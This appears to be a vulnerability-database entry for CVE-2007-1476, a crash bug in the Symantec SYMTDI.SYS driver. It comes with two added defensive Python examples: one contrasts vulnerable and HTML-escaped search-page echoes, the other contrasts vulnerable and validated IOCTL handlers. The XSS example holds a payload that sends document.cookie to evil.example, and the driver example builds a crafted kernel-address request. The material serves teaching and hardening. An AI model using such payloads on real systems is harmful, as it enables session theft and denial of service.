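The bug class behind this entry is a search page that writes the submitted term straight back into the response without HTML-encoding it. The following is an added example written for this page; it is not Cisco's PreSearch.html or PreSearch.class code. The parameter name "q", the host names, the page markup and the two payloads are all constructed assumptions. It shows the vulnerable echo beside the hardened one, in both contexts the advisory implies (the search form's text field and the page body), and a small HTML-parser based check that confirms whether active content survives in the rendered page.

```python
"""Reflected XSS in a search-form echo: vulnerable vs. hardened rendering.

Added example, not Cisco's code. Models the advisory's bug class: the term
typed into a search form is reflected into the response without encoding.
"""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, quote, urlsplit

# Constructed payloads. The query parameter "q" and the markup are assumptions;
# the advisory names only the files PreSearch.html and PreSearch.class.
PAYLOAD_SCRIPT_TAG = ("<script>document.location='http://evil.example/?c='"
                      "+document.cookie</script>")
PAYLOAD_ATTR_BREAKOUT = '" autofocus onfocus="alert(document.cookie)'


def crafted_uri(term: str) -> str:
    """The kind of URI an attacker would entice a victim into following."""
    return "http://device.example/PreSearch.html?q=" + quote(term, safe="")


def search_term_from_uri(uri: str) -> str:
    """Server side: pull the search term out of the query string."""
    return parse_qs(urlsplit(uri).query).get("q", [""])[0]


def render_vulnerable(term: str) -> str:
    """Echoes the raw term into the form field and into the page text."""
    return (
        '<form action="PreSearch.html">'
        f'<input type="text" name="q" value="{term}">'
        '</form>'
        f'<p>Results for: {term}</p>'
    )


def render_hardened(term: str) -> str:
    """HTML-encodes the term for both contexts. quote=True also encodes the
    double quote, so the attribute value cannot be closed early."""
    safe = html.escape(term, quote=True)
    return (
        '<form action="PreSearch.html">'
        f'<input type="text" name="q" value="{safe}">'
        '</form>'
        f'<p>Results for: {safe}</p>'
    )


class ActiveContentFinder(HTMLParser):
    """Collects <script> tags and on* event-handler attributes from a page."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag}@{name}")


def active_content(page: str) -> list:
    """Return the list of active-content findings in a rendered page."""
    finder = ActiveContentFinder()
    finder.feed(page)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for payload in (PAYLOAD_SCRIPT_TAG, PAYLOAD_ATTR_BREAKOUT):
        term = search_term_from_uri(crafted_uri(payload))
        print("vulnerable:", active_content(render_vulnerable(term)))
        print("hardened:  ", active_content(render_hardened(term)))
```

Encoding on output is the fix the vendor did not ship for these files (the advisory offers removal or renaming instead); the checker above is only a smoke test for reflected markup, not a substitute for a real XSS scanner.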
VAR-200703-0615 CVE-2007-1476 Symantec Norton Personal Firewall and other products SYMTDI.SYS denial of service (DoS) vulnerability CVSS V2: 1.9
CVSS V3: -
Severity: LOW
The SymTDI device driver (SYMTDI.SYS) in Symantec Norton Personal Firewall 2006 9.1.1.7 and earlier, Internet Security 2005 and 2006, AntiVirus Corporate Edition 3.0.x through 10.1.x, and other Norton products, allows local users to cause a denial of service (system crash) by sending crafted data to the driver's \Device file, which triggers invalid memory access, a different vulnerability than CVE-2006-4855. The Symantec 'SYMTDI.SYS' device driver is prone to a local denial-of-service vulnerability. A local authenticated attacker may exploit this issue to crash affected computers, denying service to legitimate users. This issue is similar to the one described in BID 22961. Symantec is currently investigating this issue; we will update this BID as more information emerges.
Norton Personal Firewall does not adequately protect its \Device\SymEvent driver and does not validate input buffers, so a local attacker can open the driver and send arbitrary data that is treated as valid. A specially crafted IRP sent to an IOCTL handler function could allow memory to be overwritten because the address space was not properly validated in some versions of the driver. A potential attacker must be logged into the computer to attempt an exploit. A successful exploit of this vulnerability could allow that user to crash their computer.
Symantec Response: Symantec engineers have verified that the vulnerability exists in the products listed in the Affected Products section of the vendor advisory, and have provided updates for all affected products. Consumer (Norton) products can be updated by running LiveUpdate. Symantec AntiVirus Corporate Edition customers can obtain the update from the Symantec web site. Symantec is not aware of any customers impacted by this issue, or of any attempts to exploit the issue.
References: This issue is a candidate for inclusion in the Common Vulnerabilities and Exposures (CVE) list (http://cve.mitre.org), which standardizes names for security problems.
The CVE initiative has assigned CVE-2007-1476 to this issue. SecurityFocus has assigned BID 22977 to this vulnerability.
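The two failures the entry describes, an input buffer whose length is not checked and a user-supplied address that is not probed before the driver writes through it, are the classic IOCTL-handler mistakes. The block below is an added, constructed model of that bug class written for this page; it is not Symantec's SYMTDI.SYS or SymEvent code and the request layout, status codes, addresses and the fake kernel are all assumptions. A vulnerable handler is shown next to a hardened one that performs the checks a Windows driver would do with InputBufferLength and ProbeForWrite (the latter inside __try/__except) before it touches anything, and a crafted request of the kind a logged-in local user could hand to the driver's \Device object shows the difference.

```python
"""IOCTL input validation: constructed model of the SYMTDI.SYS bug class.

Added example, not Symantec's driver code. A local user controls the request
bytes and the addresses inside them; the handler must not trust either.
"""
import struct

# Constructed METHOD_NEITHER-style request: u32 opcode, u32 out_len, u64 out_ptr.
# The driver is expected to write out_len bytes of results to out_ptr.
REQ_FMT = "<IIQ"
REQ_SIZE = struct.calcsize(REQ_FMT)      # 16 bytes
OP_QUERY = 1

# Constructed flat address space: user addresses below USER_LIMIT, kernel above
# (stands in for MmUserProbeAddress on x64).
USER_LIMIT = 0x00007FFFFFFF0000

STATUS_SUCCESS = 0x00000000
STATUS_ACCESS_VIOLATION = 0xC0000005     # in a real kernel this is a bugcheck
STATUS_INVALID_PARAMETER = 0xC000000D
STATUS_INVALID_DEVICE_REQUEST = 0xC0000010
STATUS_BUFFER_TOO_SMALL = 0xC0000023


class FakeKernel:
    """Records every write the handler attempts outside user space."""

    def __init__(self):
        self.kernel_writes = []

    def write_user(self, addr, length):
        """Models dereferencing a pointer the handler did not probe."""
        if addr >= USER_LIMIT or addr + length > USER_LIMIT:
            self.kernel_writes.append((addr, length))
            return STATUS_ACCESS_VIOLATION   # invalid memory access: crash
        return STATUS_SUCCESS


def craft_request(opcode=OP_QUERY, out_len=64, out_ptr=0x10000) -> bytes:
    """Bytes a local user would pass as the IOCTL input buffer (constructed)."""
    return struct.pack(REQ_FMT, opcode, out_len, out_ptr)


def handler_vulnerable(kernel, in_buf, in_len):
    """Ignores the declared length and writes wherever the request points."""
    try:
        _opcode, out_len, out_ptr = struct.unpack_from(REQ_FMT, in_buf)
    except struct.error:
        # Read past the end of a short buffer: modelled as a fault.
        return STATUS_ACCESS_VIOLATION
    return kernel.write_user(out_ptr, out_len)


def handler_hardened(kernel, in_buf, in_len):
    """Validates length, opcode and the whole target range before writing."""
    # 1. InputBufferLength must cover the fixed header before it is parsed.
    if in_len < REQ_SIZE:
        return STATUS_BUFFER_TOO_SMALL
    opcode, out_len, out_ptr = struct.unpack_from(REQ_FMT, in_buf)
    if opcode != OP_QUERY:
        return STATUS_INVALID_DEVICE_REQUEST
    # 2. ProbeForWrite equivalent: [out_ptr, out_ptr + out_len) must lie
    #    entirely in user space. Python ints do not wrap; in C guard the
    #    addition against pointer overflow as well.
    if out_len == 0 or out_ptr >= USER_LIMIT or out_ptr + out_len > USER_LIMIT:
        return STATUS_INVALID_PARAMETER
    return kernel.write_user(out_ptr, out_len)


if __name__ == "__main__":
    crafted = craft_request(out_ptr=0xFFFFF80000000000, out_len=0x1000)
    k = FakeKernel()
    print(hex(handler_vulnerable(k, crafted, REQ_SIZE)), k.kernel_writes)
    k = FakeKernel()
    print(hex(handler_hardened(k, crafted, REQ_SIZE)), k.kernel_writes)
```

The vendor's mitigation of restricting access to trusted users only limits who can open the device; the durable fix is the handler rejecting the request before it dereferences anything it received from user mode.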